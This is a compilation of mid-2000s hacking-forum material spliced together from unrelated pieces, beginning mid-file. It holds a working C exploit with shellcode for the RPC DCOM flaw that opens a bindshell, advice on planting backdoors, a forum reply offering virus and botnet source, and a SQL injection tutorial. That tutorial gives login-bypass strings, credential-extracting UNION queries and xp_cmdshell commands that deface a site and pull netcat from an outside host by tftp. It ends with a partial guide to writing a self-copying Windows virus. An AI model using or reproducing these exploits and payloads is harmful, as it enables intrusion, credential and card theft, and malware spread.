"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
/* xfocus start */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/* end xfocus */
/* Not ripped from teso =) */
void con(int sockfd)
{
char rb[1500];
fd_set fdreadme;
int i;
FD_ZERO(&fdreadme);
FD_SET(sockfd, &fdreadme);
FD_SET(0, &fdreadme);
while(1)
{
FD_SET(sockfd, &fdreadme);
FD_SET(0, &fdreadme);
if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
if(FD_ISSET(sockfd, &fdreadme))
{
if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if(write(1, rb, i) < 0) break;
}
if(FD_ISSET(0, &fdreadme))
{
if((i = read(0, rb, sizeof(rb))) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if (send(sockfd, rb, i, 0) < 0) break;
}
usleep(10000);
}
printf("[-] Connection closed by foreign host..\n");
exit(0);
}
int main(int argc, char **argv)
{
int len, len1, sockfd, c, a;
unsigned long ret;
unsigned short port = 135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
struct hostent *he;
struct sockaddr_in their_addr;
static char *hostname=NULL;
if(argc<2)
{
usage(argv[0]);
}
while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
{
switch (c)
{
case 'd':
hostname = optarg;
break;
case 't':
type = atoi(optarg);
if((type > 1) || (type < 0))
{
printf("[-] Select a valid target:\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);
return 1;
}
break;
case 'r':
targets[type].ret = strtoul(optarg, NULL, 16);
break;
case 'p':
port = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
case 'l':
lportl = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
default:
usage(argv[0]);
return 1;
}
}
if(hostname==NULL)
{
printf("[-] Please enter a hostname with -d\n");
exit(1);
}
printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
printf("[+] Resolving host..\n");
if((he = gethostbyname(hostname)) == NULL)
{
printf("[-] gethostbyname: Couldnt resolve hostname\n");
exit(1);
}
printf("[+] Done.\n");
printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n",
targets[type].os, hostname, port, lportl, targets[type].ret);
/* drg */
lportl=htons(lportl);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&sc[471],&lport,4);
memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);
their_addr.sin_family = AF_INET;
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
their_addr.sin_port = htons(port);
if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("[-] Socket failed");
return(0);
}
if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
perror("[-] Connect failed");
return(0);
}
/* xfocus start */
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);
*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
/* end xfocus */
if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
{
perror("[-] Send failed");
return(0);
}
len=recv(sockfd, buf1, 1000, 0);
if (send(sockfd,buf2,len1,0)== -1)
{
perror("[-] Send failed");
return(0);
}
close(sockfd);
sleep(1);
their_addr.sin_family = AF_INET;
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
their_addr.sin_port = lportl;
if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("[-] Socket failed");
return(0);
}
if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf("[-] Couldnt connect to bindshell, possible reasons:\n");
printf(" 1: Host is firewalled\n");
printf(" 2: Exploit failed\n");
return(0);
}
printf("[+] Connected to bindshell..\n\n");
sleep(2);
printf("-- bling bling --\n\n");
con(sockfd);
return(0);
}


*cough*it’s in C*cough*






2.5 Planting a backdoor

Ok, now what do we do? Let’s assume you’ve compromised the system you wanted to, and you’re in. You’ve done what you wanted to do, checked the vulnerabilities. Now, IF you do want to get back into the system in the future, planting a backdoor is the best way to go.(look at section 1.5 for reference) Later on, if you do not plant a back door, you have to go through the same trouble of executing the exploit, taking advantage of the vuln., and gaining more access. To make all this easier, you can plant a backdoor in the system directory or startup so you can conveniently connect to this computer again. The best backdoor is the self-programmed one. But it’s up to you on where/what to install. (check this website for viruses/backdoors , its decent : http://lbrary.2ya.com )

2.6 Automated Pen Testing

What is automated pen testing? It is a program designed to automatically access a system’s vulnerability, exploit it, and gain as much access to it. These softwares exist for the professionals who want to check the security of their website, network, server. Often, these softwares are VERY expensive and even demos require phone calls and stuff. (bleh, no w4r3z for j00) These softwares are a very useful tool for white hat hackers but if in the wrong hands, (for an example, in the hands of a 13 year old boy who wants to cause chaos) it’s a weapon.
These programs feature ip/port scanner, vulnerability scanner, exploits (executers of exploits), privilege escalation tools, more tools, more exploits, back doors, and report-maker. An example of an APT program is : CORE impact and immunity CANVAS.
www.coresecurity.com/products/coreimpact/index.php
www.immunitysec.com/products-canvas.shtml
As I said before, these tools are very expensive and I doubt you can get one tongue.gif. However, there is a excellent APT program that is FREE : as in 100% percent free. Metasploit. This program includes more than a hundred exploits and more then fifty payloads to use. IT automates using exploits and payloads, along with easily configured settings. This tool is very nifty especially because it’s free, and I recommend you to get one.(Also, it’s always updating)
www.metasploit.com

3. Credits

Credits: ME! MUHAHAH ME AND MYSELF AND ME ONLY! (and those who taught me these stuff biggrin.gif)

List of sites:
Proxy:
http://www.samair.ru/proxy/
http://www.publicproxyservers.com/
Port Reference
http://www.iana.org/assignments/port-numbers
Collection of [shitty] tools:
http://library.2ya.com


t3h l33t spl0its sites:
http://www.metasploit.com/
http://www.milw0rm.com/
http://www.securiteam.com/exploits/
http://www.iss.net/security_center/advice/...its/default.htm
http://zone-h.com/
http://www.antiserver.it/
http://www.frsirt.com/exploits/
http://packetstormsecurity.org/
http://exploits-lab.info/index.php
http://archives.neohapsis.com/archives/fulldisclosure/
http://d3fonix.uni.cc/
http://www.cert.org/nav/index_red.html
http://www.governmentsecurity.org/exploits.php
http://www.hoobie.net/security/exploits/
http://www.hackemate.com.ar/exploits/
http://www.insecure.org/sploits.html
HTTP://WWW.GOOGLE.COM

Good Sites:
http://www.rohitab.com/discuss
http://en.wikipedia.org

APT sites:
www.metasploit.com
www.coresecurity.com/products/coreimpact/index.php
www.immunitysec.com/products-canvas.shtml


//THANKS FOR READING THIS//
Turley
Aug 19 2006, 10:32 AM
Very nice tutorial DABUKE biggrin.gif
TrU Smoke
Aug 19 2006, 12:45 PM
QUOTE(Turley @ Aug 19 2006, 10:32 AM) *
Very nice tutorial DABUKE biggrin.gif

yup
Bloodrager
Aug 19 2006, 03:36 PM
There's a lot more to hacking then that.

Otherwise, it is a good tootariel for the noob-a-joobs.
Pazuzu_
Aug 21 2006, 01:00 AM
good stuff
Dabuke
Aug 21 2006, 04:22 AM
QUOTE(Bloodrager @ Aug 19 2006, 03:36 PM) *
There's a lot more to hacking then that.

Otherwise, it is a good tootariel for the noob-a-joobs.


Der biggrin.gif it's called nublet's hand manual,.. and I mentioned it only has basic stuff smile.gif

thanks for the comments though
Norpsel
Sep 14 2006, 11:37 PM
As a noob, I found this article extremely helpful and am currently bookmarking it. I really appreciate the time and effort you put into this to help people like myself.

Thanks a bunch,
Norpsel
cHiNtOfIsT
Sep 16 2006, 04:50 AM
Thank you very much I am just learning how to program in c and this manual has been very helpful.
LoX
Sep 16 2006, 12:39 PM
Because you're both noobs, Just a little note : Don't post on a topic over 1 week old unless you have something major to contribute.
MetalHead
Sep 19 2006, 08:16 PM
No, I've seen people get flamed even when they brought up alot of great points that the thread had failed to mention. Granted the thread was almost a year old but yeah...
sub7recon
Sep 23 2006, 08:42 PM
I guess I better start asking friends for war3z downloadz then smile.gif
SiM
Sep 23 2006, 11:22 PM
QUOTE(LoX @ Sep 16 2006, 01:39 PM) [snapback]158217[/snapback]
Because you're both noobs, Just a little note : Don't post on a topic over 1 week old unless you have something major to contribute.


A week or two wouldn't really bother anyone. If it was a month or so, then that's a different story.
Dabuke
Oct 14 2006, 11:54 PM
I know this post is quite old and all, but i just wanted to add that
if you need source codes of virii and botnets and whatnots,
just pm me and I'll help you. But i don't want to make is SO public that every nubajub will get
a freaking bot net.. so
Feky
Oct 16 2006, 09:43 AM
good smile.gif
----------------------------------



For more info please visit: Vicisolutions.com

Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and also the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be "unbreakable" But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with them a lot.

The article is divided into two parts:
1. Using the HTTP port 80
2. Using the MS SQL port 1434

Part I - Using HTTP port 80 ( Or better would be malformed URLs)
----------------------------------------------------------------

This part will be useful not only to the hackers but also to the web designers. A common mistake made by the web designers can reveal the databases of the server to the hacker. Lets see on it. The whole game is of query strings. So it is assumed that the reader has some knowledge about queries and asp. And one more thing. This hack is done using only through the browser. So you even don't require any other tools except IE or Netscape.
Normally, inorder to make a login page, the web designer will write the following code.
login.htm

<html>
<body>
<form method=get action="logincheck.asp">
<input type="text" name="login_name">
<input type="text" name="pass">
<input type="submit" value="sign in">
</form>
</body>
</html>

logincheck.asp

<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")

set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>
Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.
"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become
"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "
Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful.
Now what if I type loginname as "Chintan" and password as
hi' or 'a'='a
in the password text box ? The query will become as follows:
"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "
And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doesn't work for some websites:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide
Chintan ' --
Chintan " --
or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!
IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm
More advance hacking of Databases using ODBC error messages!!!
Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like
http://www.nosecurity.com/mypage.asp?id=45
in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page. The same thing can be done by directly opening the logincheck.asp page using
http://www.nosecurity.com/logincheck.asp?l...&pass=h4x3r
in the URL if method="get" is used instead of method="post".
Note : <form method=post> or <form method="get"> Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.
What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator '&'.
OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line
From the error its clear that first table is 'logintable'. It seems that this table might contain login names and passwords :-) So lets move in it. Type the following in the URL
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5
The above error message shows that the first field or column in logintable is login_id. To get the next column name will type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5
So we get one more field name as 'login_name'. To get the third field name we will write
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

Thats the login name "Rahul" and to get the password of Rahul the query would be

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.

Part II - using port 1434 (SQL Port)
-------------------------------------

Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !

The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are

sp_passsword -> Changes password for a specific login name.
e.g. EXEC sp_password 'oldpass', 'newpass', 'username'

sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)

xp_msver -> Shows the MS SQL server version including the all info about the OS.
e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key.

xp_regdeletevalue ->Delets a registry value

xp_regread -> Reads a registry value

xp_regwrite -> Writes a registry key.

xp_terminate_process -> Stops a process

Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete.

Note: "Master" is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.


Most dangerous threat : The Microsoft SQL server has default username "sa" with password blank "". And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released.

Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle's port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don't even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type.

C:\>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
<EOF> batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type

C:\> osql.exe -S 198.188.178.1 -U sa -P ""
1>
Thats what we get if we login successfully else we will get an error message as login failed for user "sa"

Now if we want to execute any command on the remote machine then just use the "xp_cmdshell" default stored procedure.

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'dir >dir.txt'"

I would prefer to use -Q option instead of -q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the "information_schema.tables" to get the list of tables and contents of it.

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select * from information_schema.tables"

And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select * from users"

And

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select username, creditcard, expdate from users"

Output:

Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

Write something in index.html file ?

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'echo defaced by Chintan > C:\inetpub\wwwroot\index.html'"

Wanna upload any file on the remote system.

C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'tftp 203.192.16.12 GET nc.exe c:\nc.exe'"

And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.

Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers.

Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.

Precautionay measures
---------------------------

<*> Change the default password for sa.
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.

------------------------------

 Smith Guide to simple C++ Viruses

Ok first off I’d like to say 2 things:

1. This guide is only intended for people who want to learn
2. I don’t condone releasing viruses in any way

Taking the above into consideration I’d like to say welcome to the world of virus programming I’m hoping upon reading this you well become as fascinated by viruses as I am and continue to study and write new unique viruses.

Most of the virus writing guides I’ve seen are lengthy, boring and out of date, this guide will try to be the opposite short, fun and to the point. Now this is what you will need to start programming:

Win32 API Reference <- Not Required but very helpful
A C++ Compiler – I Recommend DEV for people who do not wish to buy and Microsoft Visual C++ 6.0 for people with money and serious programmers, however DEV works fine.

Even if you have never programmed before you should be able to carry along with this one, but it helps if you know a little bit of C++.

Ok lets begin fire up DEV or MSVC and select new Win32 GUI for DEV users and Win32 for MSVC. Now with DEV it makes some generated code for GUI apps, delete it all leaving something like this:
QUOTE
#include <windows.h>

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
                            LPSTR lpszArgument, int nFunsterStil)

{
 
 return 0;
}

Now compile and run the code nothing should happen (if a black window pops up it means you didn’t goto win32) The reason nothing happened is because or program doesn’t do anything. It runs and exits we need to make it do something first of all add this code to the project in between the { } and before return 0;.

MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);

Now compile and run the program again A message box should pop up, cool ay? But its not much of a virus lets make it do some cool stuff. Add the following code to your project:
QUOTE
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);

MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);


Once again make sure the code is before return 0; and the { }.Ok compile and run the code, now open up the system32 directory in you windows folder (for those who don’t know goto run in the startbar and type: %windir%\system32
Ok look for a file called virus.exe in the system32 folder. Don’t believe me that its our virus? Run the file it should come up with a message box saying “Hello”.

Cool is it not? Ok time to explain how this works:

char sytem[MAX_PATH];  This is the buffer to hold the system32 directory.
char pathtofile[MAX_PATH]; This is the buffer to hold the path to our virus.

HMODULE GetModH = GetModuleHandle(NULL); This one my be hard to grasp for some but bare with me. GetModH holds the handle to our virus GetModuleHandle() gets the handle and stores it there.

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); This gets the FileName of our virus using the handle we got before and storing the path to it in pathtofile.

GetSystemDirectory(system,sizeof(system)); Basically this finds out what your system directory is. Remember not everyone’s window’s directory is c:\windows\system32. Mine is d:\winnt\system32 on this box, the reason for this is we want to copy to an existent system32 directory.

strcat(system,”\\virus.exe”); Ok we have the system32 directory c:\windows\system32 or whatever now we need a place to copy to. This function binds to strings together to form one. So our system buffer now says:
c:\windows\system32\virus.exe or whatever the case maybe. Note \\ is not a typo \\ is how c++ interprets \. A single \ is seen by c++ as an escape character and if you have one your virus will not work!

CopyFile(pathtofile,system,false); Pretty self explanatory copy from were our virus is to were we want it to be. What false means if virus.exe already exists it will copy over it, to stop this change false to true (leave it as false for this tutorial).

Ok that’s it next we are going add code so it will startup when the computer boots. We are going to use an 3 API calls to accomplish this
RegOpenKeyEx(); This opens the key we want to write to
RegSetValueEx(); This sets our value
RegCloseKey();     This closes the key

Time to add code to our fledgling virus:
QUOTE
HKEY hKey;

